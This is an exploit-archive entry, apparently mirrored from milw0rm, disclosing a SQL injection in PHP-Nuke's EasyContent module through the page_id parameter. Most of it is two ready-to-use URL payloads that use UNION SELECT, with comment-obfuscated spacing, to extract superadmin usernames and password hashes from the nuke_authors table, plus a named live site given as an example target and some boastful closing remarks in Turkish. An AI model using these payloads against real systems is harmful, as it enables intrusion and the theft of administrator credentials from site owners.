[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : PHP-Nuke Module EasyContent (page_id) SQL Injection Vulnerability
# Published : 2008-02-19
# Author : xoron
# Previous Title : Open-Realty <= 2.4.3 (last_module) Remote Code Execution Exploit
# Next Title : RunCMS Module MyAnnonces (cid) SQL Injection Vulnerability
-------------------------------------------------------------------------------
php-nuke modules EasyContent remote sql inj
-------------------------------------------------------------------------------
found =xoron
-------------------------------------------------------------------------------
modules.php?op=modload&name=EasyContent&file=index&menu=410&page_id=-1/**/union/**/select/**/0,aid/**/from/**/nuke_authors/**/where/**/radminsuper=1/*
modules.php?op=modload&name=EasyContent&file=index&menu=410&page_id=-1/**/union/**/select/**/0,pwd/**/from/**/nuke_authors/**/where/**/radminsuper=1/*
-------------------------------------------------------------------------------
Example: http://eurowards.org/content/
not: password and username in title! colomb number 1
not2: Adam gibi bug bulunda dolan?±n ortalarda, istenilince ne kadar bo?? bug varsa b??le post edilir milw0rma.
i??e yarar bug nas?±l hit yap?±yor g??rmek istiyorsan?±z
http://www.milw0rm.com/author/721
sadece bi bug 16000+ hit sadece milw0rm;)
Herzmn kral benimdir!
-------------------------------------------------------------------------------
# www.Syue.com [2008-02-19]